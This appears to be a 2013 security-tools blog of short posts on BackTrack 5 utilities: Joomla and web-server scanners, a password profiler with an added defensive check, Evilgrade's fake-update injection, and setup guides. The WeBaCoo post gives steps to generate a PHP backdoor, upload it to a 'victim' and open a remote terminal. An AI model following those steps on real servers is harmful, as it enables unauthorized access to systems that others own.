
Wednesday, December 4, 2013

JOOMSCAN (JOOMLA SECURITY SCANNER)




Joomscan is a penetration testing tool that helps find vulnerabilities in the Joomla CMS. The updated version can detect 673 vulnerabilities. It detects file inclusion, SQL injection and command execution vulnerabilities in a target Joomla! web site.

VIDEO TUTORIAL:
http://adf.ly/VVqO6

DOWNLOAD LINK:       LINK 1

WEBACOO - WEB BACKDOOR COOKIE SCRIPT-KIT


Usage: webacoo.pl [options]


Options:
-g Generate backdoor code (-o is required)

-f FUNCTION PHP System function to use


FUNCTION:
1: system (default)
2: shell_exec
3: exec
4: passthru
5: popen

-o OUTPUT Generated backdoor output filename

-r Return un-obfuscated backdoor code

-t Establish remote "terminal" connection (-u is required)

-u URL Backdoor URL

-c C_NAME Cookie name (default: "M-cookie")

-d DELIM Delimiter (default: New random for each request)

-a AGENT HTTP header user-agent (default exist)

-p PROXY Use proxy (tor, ip:port or user:pass:ip:port)

-v LEVEL Verbose level
LEVEL:
0: no additional info (default)
1: print HTTP headers
2: print HTTP headers + data

-h Display help and exit

update Check for updates and apply if any

1. Generate php backdoor file
- ./webacoo.pl -g -o backdoor.php

2. Upload backdoor to victim

3. Use WeBaCoo connect to backdoor
- ./webacoo.pl -t -u http://victim/backdoor.php

4. Now you are in the victim console, do whatever you want :)

VIDEO TUTORIAL:
http://www.youtube.com/watch?v=6PS3ul7_JRo

DOWNLOAD LINK:     LINK 1

WSORROW TOOL

web-sorrow is a Perl-based tool used for checking a web server for misconfiguration, version detection, enumeration, and server information. It is NOT a vulnerability scanner, inspection proxy, DDoS tool or an exploitation framework.

Current Functionality:

-S – stands for standard. A set of standard tests that includes: directory indexing testing, banner grabbing, language detection (should be obvious), robots.txt, and 200 response testing (some servers send a 200 OK for every request).

-Eb – stands for error bagging. The default config for servers is to put the server daemon and version, and sometimes even the OS, inside error pages. web-sorrow requests a URL of 20 random bytes with the GET and POST methods.

-auth – looks for login pages with a list of some of the most common login files and dirs. The list of URLs doesn't need to be very big, because what else are you going to name it?

-cmsPlugins – runs a huge list of plugin dirs for CMS servers. The list is a bit old (2010).

-I – searches the responses for interesting strings.

-Ws – looks for web services such as hosting provider, blogging services, favicon fingerprinting, and CMS version info.

-Fd – looks for things people generally don't want you to see. The list is generated from a TON of robots.txt files, so whatever it finds should be interesting.

-proxy – send all HTTP requests via a proxy. Example: 255.255.255.254:8080

-e – run all the scans in the scanner.

web-sorrow also has false-positive checking on most of its requests (it is pretty accurate but not perfect).

VIDEO TUTORIAL:
http://www.youtube.com/watch?v=GoSzXtKGU9o

DOWNLOAD LINK:       LINK 1

Cupp (Common User Passwords Profiler)





Cupp is a common user password profiler. Using this script we can build our own dictionary by profiling someone: birthday, nickname, address, name of a pet or relative, or common words like god, love, money, or any other likely passwords.
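A defensive counterpart to the profiling described above, as an added example (not cupp's own code): a password check that builds the same kind of profile-derived candidate set (names, nickname, pet, birthday fragments, the common words named here, plus reversed and leet variants) and rejects passwords that fall in it. The profile fields, the leet table and the sample passwords are constructed for the demo.

```python
"""Profile-aware password check. Added example for this post, not cupp's
own code; the leet table, profile fields and sample values are constructed."""
import itertools
import re

# Leet substitutions that profile-based wordlist generators commonly apply.
LEET = {"a": "4", "e": "3", "i": "1", "o": "0", "s": "5", "t": "7"}
COMMON_WORDS = ("god", "love", "money")  # the common words named in the post


def date_tokens(birthday: str) -> set[str]:
    """Expand 'DD/MM/YYYY' into the fragments typically appended to words."""
    day, month, year = birthday.split("/")
    return {day, month, year, year[2:], day + month, month + day,
            day + month + year, day + month + year[2:]}


def profile_tokens(profile: dict[str, str]) -> set[str]:
    """Collect every lowercase word (3+ chars) a profile contributes."""
    tokens = set(COMMON_WORDS)
    for key, value in profile.items():
        if key == "birthday":
            continue
        for part in re.split(r"\W+", value.lower()):
            if len(part) >= 3:
                tokens.add(part)
    return tokens


def candidate_words(profile: dict[str, str]) -> set[str]:
    """Words, reversed words, leet variants, and word + date-fragment combos."""
    base = profile_tokens(profile)
    dates = date_tokens(profile["birthday"]) if "birthday" in profile else set()
    words = set(base) | {w[::-1] for w in base}
    words |= {"".join(LEET.get(c, c) for c in w) for w in base}
    words |= {w + d for w, d in itertools.product(words, dates)}
    return words


def is_profile_derived(password: str, profile: dict[str, str]) -> bool:
    """True when the password (lowercased, trailing symbols stripped, with or
    without trailing digits) matches a word the profile would generate."""
    core = re.sub(r"[!@#$%^&*]+$", "", password.lower())
    words = candidate_words(profile)
    return core in words or core.rstrip("0123456789") in words


if __name__ == "__main__":
    demo = {"name": "John Smith", "nickname": "johnny",
            "pet": "Fluffy", "birthday": "14/07/1990"}  # constructed profile
    for pw in ("Fluffy1990", "j0hnny!", "correct-horse-battery-staple"):
        print(pw, "-> profile-derived" if is_profile_derived(pw, demo) else "-> ok")
```

Such a check belongs in the password-change path of an application that already holds the user's profile fields; it complements, rather than replaces, length and breach-list checks.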

Options:

-h You are looking at it baby! :)
For more help take a look in docs/README
Global configuration file is cupp.cfg


-i Interactive questions for user password profiling

-w Use this option to improve existing dictionary, or WyD.pl output to make some pwnsauce

-l Download huge wordlists from repository

-a Parse default usernames and passwords directly from Alecto DB.
Project Alecto uses purified databases of Phenoelit and CIRT which where merged and enhanced.


-v Version of the program


VIDEO TUTORIAL:
http://www.youtube.com/watch?v=U0kAE3uj4Qs


DOWNLOAD LINK:    LINK 1

Thursday, November 28, 2013

How to use Joomscan to find the Joomla Vulnerability in Backtrack 5 Linux?

Joomscan is a penetration testing tool that helps find vulnerabilities in the Joomla CMS. The updated version can detect 550 vulnerabilities. Let me show how to use Joomscan in Backtrack 5.

Download the Joomscan from here:
http://web-center.si/joomscan



Step 1: Moving to PenTest folder

Copy/Move the downloaded files in directory

/pentest/web/scanners/joomscan/


Step2: Set Permission

Now you have to set permissions on the Joomscan file. To do this, type the following command in the terminal (if you don't know how to open a terminal at all, please stop reading this and start with the basics of Linux):

chmod 0777 joomscan.pl


Step 3: Update

Update the scanner to latest version. To do this, enter the following command in Terminal:

./joomscan.pl update


Step 4: Scanning for Vulnerability

Now that everything is OK, we have to scan our Joomla site for vulnerabilities. To do this, enter the following command in the terminal:

./joomscan.pl -u www.YourJoomlasite.com


Wait for a while, and it will list the vulnerabilities found.


Tuesday, June 18, 2013

BACKTRACK 5 R1 RELEASED




Backtrack-Linux released the BackTrack 5 R1 Linux distribution. This release contains over 120 bug fixes, 30 new tools and 70 tool updates. The kernel was updated to 2.6.39.4 and includes the relevant injection patches.

BackTrack is intended for all audiences, from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest collection of security tools to date. Our community of users ranges from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community. This release is their best one yet! Some pesky issues such as rfkill in VMWare with rtl8187 issues have been fixed, which provides for a much more solid experience with BackTrack. We have Gnome and KDE ISO images for 32 and 64 bit (no ARM this release), as well as a VMWare image of a 32 bit Gnome install, with VMWare Tools pre-installed.
We are mighty excited and are already downloading this release just as we speak.


Download Backtrack 5 R1

Friday, May 31, 2013

USEFUL THINGS IN BACKTRACK LINUX



I'm trying to write down the 5 most useful things you should know in Backtrack Linux. Please check them below.


1. About username and password. Backtrack uses root as the username and toor as the password. You have to provide them the first time you log in after your first installation.


2. The startx command. Don't be shocked if you see a black screen with only a command line when you use Backtrack. Backtrack is designed to be used from the command line, but if you want to enable the window system, you can type the startx command after you log in.


3. Metasploit Framework. The most famous tool in Backtrack is the Metasploit Framework; this tool is used for penetration testing of vulnerable systems. You can go to the Metasploit Framework by typing /pentest/exploits/framework3/msfconsole, and there is also /pentest/exploits/framework2/msfconsole.


4. Log Out. In Backtrack you cannot restart or shut down your computer from X-Window. The one thing you can do when you finish using Backtrack from X-Window is Log Out. To do this, click the Dragon icon at the bottom left of your Backtrack desktop and then click Log Out.


5. Shutdown and Restart. When you finish using X-Window, you will be back in the terminal.
To shut down your Backtrack: poweroff
To restart your Backtrack: reboot
That's it... very simple, right? Just try it yourself.

EVILGRADE 2.0 ERROR ON BACKTRACK 5 - SOLVED




I'm running Evilgrade on Backtrack 5. Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates.


It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has its own WebServer and DNSServer modules. It is easy to set up new settings, and it has autoconfiguration when new binary agents are set.


When I try to run Evilgrade (./evilgrade), there is an error:


./evilgrade


Can't locate Data/Dump.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at isrcore/Shell.pm line 28.


To solve this error, just run

cpan Data::Dump

in your terminal. Finished.

Tuesday, May 21, 2013

HOW TO INSTALL FLASHPLAYER ON BACKTRACK 5







Install Flash Player on Backtrack 5 R2 step by step

Download the file below and click Save to save the .deb file as shown in the screenshot.

DOWNLOAD flash_player_10_linux.tar


Now type the command below inside the terminal. Make sure you are in the downloads directory first; do an ls if needed to make sure.

tar xvfz install_flash_player_10_linux.tar.gz


The result should look like the screenshot below if it went correctly.



Now keep the terminal open, type in the command below and press Enter.

mkdir ~/.mozilla/plugins



Last but not least, type the command shown below into the same terminal window and press Enter.

mv -f libflashplayer.so ~/.mozilla/plugins/



That's it, Flash Player should now be installed and working. Hope you enjoyed this tutorial and that it helps someone out...

Thursday, April 25, 2013

How To Install Backtrack 5 On Virtual Machine ?



If you want to experience and experiment with Backtrack 5 hacking tools such as Kismet, Metasploit etc., then today I am going to show you how you can install and run the Backtrack 5 operating system inside a virtual machine (VirtualBox). It works on all computers running any operating system such as Windows XP, Windows 7, or Mac OS X. So let's get started installing Backtrack 5 on your operating system.

Downloading software to install Backtrack on VirtualBox
1. First you will need a virtual machine to run Backtrack 5, which you can download from the VirtualBox website. After downloading VirtualBox, install the program. Installing VirtualBox is really simple, like any other program you install on your computer.
2. Then you will need the Backtrack 5 .iso file, which you can download from Here with the configuration below. You can download it directly or via torrent; that's your choice.


Getting started installing Backtrack 5 on Virtual Box

1. Open VirtualBox and click on New. A popup box will appear; in it, enter the Name as Backtrack, Type as Linux and Version as Ubuntu, as shown in the picture below, and click on Next.


2. Next, allocate memory to your virtual machine. I usually allocate half the RAM I have, which is 2GB of 4GB, as shown below, and click Next.


3. Then choose the second option, Create Virtual Hard Drive Now, from the three options and click on Next.
4. Then choose VDI (Virtual Disk Image) from all the options and click Next.
5. Now two options will appear for allocating size on the hard drive; from these choose Dynamically Allocated and click Next.
6. Then leave the name as it is, allocate a size of around 15-20GB and click Create.
7. Now you will have your virtual machine on the left. To start it, double-click the virtual machine. As you are running it for the first time, you need to configure it.
8. Navigate to the Backtrack 5 .iso file we downloaded by clicking on the button I highlighted in red in the image below, select it and click on Start.


9. After clicking on Start, press Enter, leave the settings as they are and press Enter again.
10. Now it will ask for a command, so type startx and press Enter, and it will load the Backtrack user interface.
11. Click on the Install Backtrack icon on the desktop and it will open the installation window. Leave the language as English and click on Forward. It will now ask for your location; enter your location and press Forward.
12. On steps 3, 4, 5 and 6 you don't need to do anything, just click on Forward, and on step 7 click on Install. It will take a couple of minutes and you will have Backtrack 5 installed on your computer.
13. Now you will need to enter a username and password to enter Backtrack; the default username for Backtrack is root and the password is toor. You can use the passwd command to change your password.
14. Done you now have Backtrack 5 running on your virtual machine.